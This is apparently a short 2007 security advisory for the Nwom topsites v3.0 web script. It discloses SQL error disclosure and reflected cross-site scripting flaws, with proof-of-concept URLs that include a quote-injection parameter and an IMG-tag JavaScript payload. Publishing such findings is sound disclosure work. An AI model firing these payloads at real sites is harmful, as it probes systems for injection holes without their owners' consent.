Nwom topsites v3.0

2007.01.17

Credit: Luny

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2007-0250 | CVE-2007-0249

CWE: N/A

Nwom topsites v3.0
http://www.nwom.net

Vulnerable files:

Comment input.
index.php

SQL info released on error:
http://www.example.com/index.php?o='

XSS:
http://www.example.com/index.php?o=<IMG%20SRC=javascript:alert(String.fr
omCharCode(88,83,83))>

- Luny

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Nwom topsites v3.0

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Nwom topsites v3.0

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.